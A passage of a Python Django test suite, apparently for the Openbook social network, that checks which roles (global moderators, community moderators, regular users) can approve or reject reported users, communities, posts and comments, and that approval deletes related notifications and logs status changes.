headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_approve_user_moderated_object_if_regular_user(self):
"""
should not be able to approve a user moderated object if regular user
"""
regular_user = make_user()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_approve_community_moderated_object_if_global_moderator(self):
"""
should be able to approve a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_community_moderated_object_deleted_community_new_post_notifications(self):
"""
should remove community new post notifications on approving a community moderated object
"""
global_moderator = make_global_moderator()
community_admin = make_user()
community = make_community(creator=community_admin)
reporter_community = make_user()
reporter_community.join_community_with_name(community_name=community.name)
reporter_community.enable_new_post_notifications_for_community_with_name(community_name=community.name)
post = community_admin.create_community_post(text=make_fake_post_text(), community_name=community.name)
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
CommunityNewPostNotification = get_community_new_post_notification_model()
self.assertFalse(CommunityNewPostNotification.objects.filter(post=post).exists())
def test_approving_community_moderated_object_deleted_community_invite_notifications(self):
"""
should remove community invite notifications on approving a community moderated object
"""
global_moderator = make_global_moderator()
community_admin = make_user()
community_invitee = make_user()
community = make_community(creator=community_admin)
community_invitee.follow_user(user=community_admin)
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
community_invite = community_admin.invite_user_with_username_to_community_with_name(
username=community_invitee.username,
community_name=community.name)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
CommunityInviteNotification = get_community_invite_notification_model()
self.assertFalse(CommunityInviteNotification.objects.filter(community_invite=community_invite).exists())
def test_cant_approve_community_moderated_object_if_community_moderator(self):
"""
should not be able to approve a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_approve_community_moderated_object_if_regular_community(self):
"""
should not be able to approve a community moderated object if regular community
"""
regular_community = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_community)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_approve_community_post_moderated_object_if_global_moderator(self):
"""
should be able to approve a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_community_post_moderated_object_deletes_post_reaction_notifications(self):
"""
should delete post reaction notifications on approving a community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_reactor = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post_reactor.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
emoji_group = make_reactions_emoji_group()
emoji_id = make_emoji(group=emoji_group).pk
community_post_reaction = community_post_reactor.react_to_post(
post=community_post, emoji_id=emoji_id)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostReactionNotification = get_post_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostReactionNotification.objects.filter(post_reaction=community_post_reaction))
def test_approving_community_post_moderated_object_deletes_comment_notifications(self):
"""
should delete comment notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_commenter = make_user()
community_post_replier = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post_commenter.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_commenter.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentNotification = get_post_comment_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentNotification.objects.filter(
post_comment=community_post_comment).exists())
def test_approving_community_post_moderated_object_deletes_comment_reply_notifications(self):
"""
should delete comment reply notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReplyNotification = get_post_comment_reply_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReplyNotification.objects.filter(
post_comment=community_post_comment_reply).exists())
def test_approving_community_post_moderated_object_deletes_comment_reaction_notifications(self):
"""
should delete comment reaction notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# react to comment
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reaction = community_post_comment_reactor.react_to_post_comment(
post_comment=community_post_comment,
emoji_id=emoji.pk)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reaction).exists())
def test_approving_community_post_moderated_object_deletes_comment_reply_reaction_notifications(self):
"""
should delete comments reply reactions notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_replier = make_user()
community_post_comment_reply_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_replier.join_community_with_name(community_name=community.name)
community_post_comment_reply_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_comment_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
# react to reply
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reply_reaction = community_post_comment_reply_reactor.react_to_post_comment(
post_comment=community_post_comment_reply,
emoji_id=emoji.pk)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reply_reaction).exists())
def test_approving_community_post_moderated_object_deletes_post_comment_user_mention_notifications(self):
"""
should delete comment user mention notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
mmentioned_user = make_user(username='joelito')
post_comment_text = 'Hello @joelito'
community_post_comment_creator.join_community_with_name(community_name=community.name)
mmentioned_user.join_community_with_name(community_name=community.name)
# create community post and comment with mention
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=post_comment_text)
# get user mention
PostCommentUserMention = get_post_comment_user_mention_model()
community_post_comment_user_mention = PostCommentUserMention.objects.get(post_comment=community_post_comment)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentUserMentionNotification = get_post_comment_user_mention_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentUserMentionNotification.objects.filter(
post_comment_user_mention=community_post_comment_user_mention).exists())
def test_approving_community_post_moderated_object_deletes_post_user_mention_notifications(self):
"""
should delete post user mention notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
mmentioned_user = make_user(username='joelito')
post_text = 'Hello @joelito'
community_post_comment_creator.join_community_with_name(community_name=community.name)
mmentioned_user.join_community_with_name(community_name=community.name)
# create community post with mention
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=post_text)
# get user mention
PostUserMention = get_post_user_mention_model()
community_post_user_mention = PostUserMention.objects.get(post=community_post)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostUserMentionNotification = get_post_user_mention_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostUserMentionNotification.objects.filter(
post_user_mention=community_post_user_mention).exists())
def test_can_approve_community_post_moderated_object_if_community_post_moderator(self):
"""
should be able to approve a community_post moderated object if community_post moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_cant_approve_community_post_moderated_object_if_regular_user(self):
"""
should not be able to approve a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_approve_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to approve a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_notifications(self):
"""
should delete comment notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_another_commenter = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_another_commenter.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
community_post_second_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentNotification = get_post_comment_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentNotification.objects.filter(
post_comment=community_post_comment).exists())
self.assertFalse(PostCommentNotification.objects.filter(
post_comment=community_post_second_comment).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_reply_notifications(self):
"""
should delete comment reply notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReplyNotification = get_post_comment_reply_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReplyNotification.objects.filter(
post_comment=community_post_comment_reply).exists())
def test_approving_community_post_comment_moderated_object_that_is_reply_deletes_comment_reply_notifications(self):
"""
should delete comment reply notifications on approving community_post_comment (that is a reply) moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
# report the reply
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment_reply,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReplyNotification = get_post_comment_reply_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReplyNotification.objects.filter(
post_comment=community_post_comment_reply).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_reaction_notifications(self):
"""
should delete comment reaction notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# react to comment
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reaction = community_post_comment_reactor.react_to_post_comment(
post_comment=community_post_comment,
emoji_id=emoji.pk)
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reaction).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_reply_reaction_notifications(self):
"""
should delete comments reply reactions notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_replier = make_user()
community_post_comment_reply_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_replier.join_community_with_name(community_name=community.name)
community_post_comment_reply_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_comment_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
# react to reply
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reply_reaction = community_post_comment_reply_reactor.react_to_post_comment(
post_comment=community_post_comment_reply,
emoji_id=emoji.pk)
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reply_reaction).exists())
def test_approving_community_post_comment_moderated_object_deletes_user_mention_notifications(self):
"""
should delete user mention notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
mmentioned_user = make_user(username='joelito')
post_comment_text = 'Hello @joelito'
community_post_comment_creator.join_community_with_name(community_name=community.name)
mmentioned_user.join_community_with_name(community_name=community.name)
# create community post and comment with mention
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=post_comment_text)
# get user mention
PostCommentUserMention = get_post_comment_user_mention_model()
community_post_comment_user_mention = PostCommentUserMention.objects.get(post_comment=community_post_comment)
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentUserMentionNotification = get_post_comment_user_mention_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentUserMentionNotification.objects.filter(
post_comment_user_mention=community_post_comment_user_mention).exists())
def test_can_approve_community_post_comment_moderated_object_if_community_post_comment_moderator(self):
"""
should be able to approve a community_post_comment moderated object if community_post_comment moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_cant_approve_community_post_comment_moderated_object_if_regular_community_post_comment(self):
"""
should not be able to approve a community_post_comment moderated object if regular community_post_comment
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_creates_approved_changed_log_on_update(self):
"""
should create an approved changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectStatusChangedLog.objects.filter(
changed_from=ModeratedObject.STATUS_PENDING,
changed_to=ModeratedObject.STATUS_APPROVED,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def _get_url(self, moderated_object):
return reverse('approve-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class RejectModeratedObjectApiTests(OpenbookAPITestCase):
"""
ModeratedObjectAPI
"""
def test_can_reject_user_moderated_object_if_global_moderator(self):
"""
should be able to reject a user moderated object if global moderator
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_REJECTED
).exists())
def test_cant_reject_user_moderated_object_if_community_moderator(self):
"""
should not be able to reject a user moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_reject_user_moderated_object_if_regular_user(self):
"""
should not be able to reject a user moderated object if regular user
"""
regular_user = make_user()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
